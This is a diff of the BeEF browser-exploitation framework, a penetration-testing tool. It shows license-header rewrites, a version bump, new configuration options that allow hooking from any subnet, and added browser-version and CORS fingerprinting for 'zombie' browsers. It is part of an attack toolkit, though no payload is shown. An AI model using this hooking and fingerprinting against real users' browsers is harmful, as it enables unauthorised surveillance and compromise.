print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
if config.get("beef.http.websocket.secure")
print_info "Starting WebSocketSecure server on port [#{config.get("beef.http.websocket.secure_port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
end
end
# @note Call the API method 'pre_http_start'
BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)
@@ -140,7 +131,7 @@ if config.get("beef.extension.console.shell.enable") == true
begin
FileUtils.mkdir_p(File.expand_path(config.get("beef.extension.console.shell.historyfolder")))
BeEF::Extension::Console::Shell.new(BeEF::Extension::Console::Shell::DefaultPrompt,
BeEF::Extension::Console::Shell::DefaultPromptChar,{'config' => config, 'http_hook_server' => http_hook_server}).run
BeEF::Extension::Console::Shell::DefaultPromptChar, {'config' => config, 'http_hook_server' => http_hook_server}).run
rescue Interrupt
end
else

45
config.yaml
View File

@@ -1,31 +1,21 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
version: '0.4.3.6-alpha'
version: '0.4.3.8-alpha'
debug: false
restrictions:
# subnet of browser ip addresses that can hook to the framework
# subnet of browser ip addresses that can hook to the framework
permitted_hooking_subnet: "0.0.0.0/0"
# subnet of browser ip addresses that can connect to the UI
# subnet of browser ip addresses that can connect to the UI
# permitted_ui_subnet: "127.0.0.1/32"
permitted_ui_subnet: "0.0.0.0/0"
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "0.0.0.0"
@@ -42,8 +32,9 @@ beef:
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
secure: false # use WebSocketSecure
port: 61985 # good success rate through proxies
secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
port: 61985 # WS: good success rate through proxies
secure_port: 61986 # WSS
alive_timer: 1000 # poll BeEF every second
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
@@ -68,7 +59,7 @@ beef:
# db_file is only used for sqlite
db_file: "beef.db"
# db connection information is only used for mysql/postgres
db_host: "localhost"
db_name: "beef"
@@ -86,13 +77,17 @@ beef:
# You may override default extension configuration parameters here
extension:
requester:
enable: true
enable: true
proxy:
enable: true
enable: true
metasploit:
enable: false
console:
shell:
enable: false
social_engineering:
enable: true
evasion:
enable: false
console:
shell:
enable: false
ipec:
enable: true

16
core/api.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/api/extension.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/api/extensions.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API

16
core/api/main/configuration.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API

16
core/api/main/migration.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API

16
core/api/main/network_stack/assethandler.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API

16
core/api/main/server.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API

16
core/api/main/server/hook.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API

16
core/api/module.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API

16
core/api/modules.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API

17
core/bootstrap.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
@@ -50,6 +40,7 @@ require 'core/hbmanager'
## @note Include RESTful API
require 'core/main/rest/handlers/hookedbrowsers'
require 'core/main/rest/handlers/modules'
require 'core/main/rest/handlers/categories'
require 'core/main/rest/handlers/logs'
require 'core/main/rest/handlers/admin'
require 'core/main/rest/api'

16
core/core.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

16
core/extension.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension

16
core/extensions.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extensions

16
core/filters.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Filters

16
core/filters/base.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Filters

16
core/filters/browser.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Filters

16
core/filters/command.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Filters

16
core/filters/http.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Filters

16
core/filters/page.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Filters

16
core/hbmanager.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module HBManager

15
core/loader.rb
View File

@@ -1,17 +1,8 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# @note Include here all the gems we are using
require 'rubygems'

5
core/main/client/are.js
View File

@@ -1,3 +1,8 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.are = {
init:function(){

17
core/main/client/beef.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* BeEF JS Library <%= @beef_version %>
* http://beef.googlecode.com/

138
core/main/client/browser.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* @literal object: beef.browser
*
@@ -60,12 +51,22 @@ beef.browser = {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance;
},
/**
*
* Returns true if IE10.
* @example: beef.browser.isIE10()
*/
// placeholder
isIE10: function() {
return false;
},
/**
* Returns true if IE.
* @example: beef.browser.isIE()
*/
isIE: function() {
return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9();
return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9() || this.isIE10();
},
/**
@@ -188,12 +189,28 @@ beef.browser = {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null;
},
/**
* Returns true if FF15
* @example: beef.browser.isFF15()
*/
isFF15: function() {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/15\./) != null;
},
/**
* Returns true if FF16
* @example: beef.browser.isFF16()
*/
isFF16: function() {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/16\./) != null;
},
/**
* Returns true if FF.
* @example: beef.browser.isFF()
*/
isFF: function() {
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14();
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16();
},
/**
@@ -201,7 +218,7 @@ beef.browser = {
* @example: beef.browser.isS4()
*/
isS4: function() {
return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
},
/**
@@ -209,23 +226,23 @@ beef.browser = {
* @example: beef.browser.isS5()
*/
isS5: function() {
return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
},
/**
* Returns true if Safari 6.xx
* @example: beef.browser.isS6()
*/
isS6: function() {
return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
},
/**
* Returns true if Safari 6.xx
* @example: beef.browser.isS6()
*/
isS6: function() {
return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
},
/**
* Returns true if Safari.
* @example: beef.browser.isS()
*/
isS: function() {
return this.isS4() || this.isS5() || this.isS6() || (!window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
return this.isS4() || this.isS5() || this.isS6();
},
/**
@@ -364,12 +381,20 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==21)?true:false);
},
/**
* Returns true if Chrome 22.
* @example: beef.browser.isC22()
*/
isC22: function() {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==22)?true:false);
},
/**
* Returns true if Chrome.
* @example: beef.browser.isC()
*/
isC: function() {
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21();
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22();
},
/**
@@ -441,11 +466,12 @@ beef.browser = {
C14: this.isC14(), // Chrome 14
C15: this.isC15(), // Chrome 15
C16: this.isC16(), // Chrome 16
C17: this.isC17(), // Chrome 17
C17: this.isC17(), // Chrome 17
C18: this.isC18(), // Chrome 18
C19: this.isC19(), // Chrome 19
C20: this.isC20(), // Chrome 20
C21: this.isC21(), // Chrome 21
C21: this.isC21(), // Chrome 21
C22: this.isC22(), // Chrome 22
C: this.isC(), // Chrome any version
FF2: this.isFF2(), // Firefox 2
@@ -463,24 +489,27 @@ beef.browser = {
FF12: this.isFF12(), // Firefox 12
FF13: this.isFF13(), // Firefox 13
FF14: this.isFF14(), // Firefox 14
FF15: this.isFF15(), // Firefox 15
FF16: this.isFF16(), // Firefox 16
FF: this.isFF(), // Firefox any version
IE6: this.isIE6(), // Internet Explorer 6
IE7: this.isIE7(), // Internet Explorer 7
IE8: this.isIE8(), // Internet Explorer 8
IE9: this.isIE9(), // Internet Explorer 9
IE10: this.isIE10(), // Internet Explorer 10
IE: this.isIE(), // Internet Explorer any version
O9_52: this.isO9_52(), // Opera 9.50 through 9.52
O9_60: this.isO9_60(), // Opera 9.60 through 9.64
O10: this.isO10(), // Opera 10.xx
O11: this.isO11(), // Opera 11.xx
O12: this.isO12(), // Opera 11.xx
O12: this.isO12(), // Opera 11.xx
O: this.isO(), // Opera any version
S4: this.isS4(), // Safari 4.xx
S5: this.isS5(), // Safari 5.xx
S6: this.isS6(), // Safari 6.x
S6: this.isS6(), // Safari 6.x
S: this.isS() // Safari any version
}
},
@@ -505,13 +534,14 @@ beef.browser = {
if (this.isC14()) { return '14' }; // Chrome 14
if (this.isC15()) { return '15' }; // Chrome 15
if (this.isC16()) { return '16' }; // Chrome 16
if (this.isC17()) { return '17' }; // Chrome 17
if (this.isC18()) { return '18' }; // Chrome 18
if (this.isC19()) { return '19' }; // Chrome 19
if (this.isC17()) { return '17' }; // Chrome 17
if (this.isC18()) { return '18' }; // Chrome 18
if (this.isC19()) { return '19' }; // Chrome 19
if (this.isC20()) { return '20' }; // Chrome 20
if (this.isC21()) { return '21' }; // Chrome 21
if (this.isC21()) { return '21' }; // Chrome 21
if (this.isC22()) { return '22' }; // Chrome 22
if (this.isFF2()) { return '2' }; // Firefox 2
if (this.isFF2()) { return '2' }; // Firefox 2
if (this.isFF3()) { return '3' }; // Firefox 3
if (this.isFF3_5()) { return '3.5'}; // Firefox 3.5
if (this.isFF3_6()) { return '3.6'}; // Firefox 3.6
@@ -526,21 +556,24 @@ beef.browser = {
if (this.isFF12()) { return '12' }; // Firefox 12
if (this.isFF13()) { return '13' }; // Firefox 13
if (this.isFF14()) { return '14' }; // Firefox 14
if (this.isFF15()) { return '15' }; // Firefox 15
if (this.isFF16()) { return '16' }; // Firefox 16
if (this.isIE6()) { return '6' }; // Internet Explorer 6
if (this.isIE7()) { return '7' }; // Internet Explorer 7
if (this.isIE8()) { return '8' }; // Internet Explorer 8
if (this.isIE9()) { return '9' }; // Internet Explorer 9
if (this.isIE10()) { return '10' }; // Internet Explorer 10
if (this.isS4()) { return '4' }; // Safari 4
if (this.isS5()) { return '5' }; // Safari 5
if (this.isS6()) { return '6' }; // Safari 5
if (this.isS6()) { return '6' }; // Safari 5
if (this.isO9_52()) { return '9.5'}; // Opera 9.5x
if (this.isO9_52()) { return '9.5'}; // Opera 9.5x
if (this.isO9_60()) { return '9.6'}; // Opera 9.6
if (this.isO10()) { return '10' }; // Opera 10.xx
if (this.isO11()) { return '11' }; // Opera 11.xx
if (this.isO12()) { return '12' }; // Opera 12.xx
if (this.isO12()) { return '12' }; // Opera 12.xx
return 'UNKNOWN'; // Unknown UA
},
@@ -590,11 +623,11 @@ beef.browser = {
},
/**
* Checks if the zombie has Java enabled.
* Checks if the zombie has Java enabled.
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.javaEnabled()) { ... }
*/
*
* @example: if(beef.browser.javaEnabled()) { ... }
*/
javaEnabled: function() {
return (!!window.navigator.javaEnabled());
@@ -605,8 +638,8 @@ beef.browser = {
* Checks if the Phonegap API is available from the hooked domain.
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.hasJava()) { ... }
*/
* @example: if(beef.browser.hasPhonegap()) { ... }
*/
hasPhonegap: function() {
var result = false;
try { if (!!device.phonegap) result = true; else result = false; }
@@ -614,6 +647,21 @@ beef.browser = {
return result;
},
/**
* Checks if the browser supports CORS
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.hasCors()) { ... }
*/
hasCors: function() {
if ('withCredentials' in new XMLHttpRequest())
return true;
else if (typeof XDomainRequest !== "undefined")
return true;
else
return false;
},
/**
* Checks if the zombie has Java installed and enabled.
* @return: {Boolean} true or false.
@@ -627,7 +675,7 @@ beef.browser = {
return false;
}
// This is a temporary fix as this does not work on Safari and Chrome
// This is a temporary fix as this does not work on Safari and Chrome
// Chrome requires manual user intervention even with unsigned applets.
// Safari requires a few seconds to load the applet.
if (beef.browser.isC() || beef.browser.isS()) {

209
core/main/client/browser/cookie.js
View File

@@ -1,110 +1,101 @@
//
